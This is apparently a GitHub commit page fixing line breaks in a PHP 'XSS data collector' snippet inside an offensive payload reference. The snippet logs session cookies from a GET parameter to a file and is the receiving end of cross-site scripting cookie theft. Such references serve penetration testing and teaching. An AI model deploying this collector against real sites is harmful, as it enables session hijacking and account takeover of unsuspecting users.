Merge pull request #242 from maxrodrigo/master

Fix PHP XSS data collector line breaks
patch-1
Swissky 2020-09-05 11:46:08 +02:00 committed by GitHub
commit b5e511c03b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 22 deletions

View File

@ -82,7 +82,7 @@ Write the collected data into a file.
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
```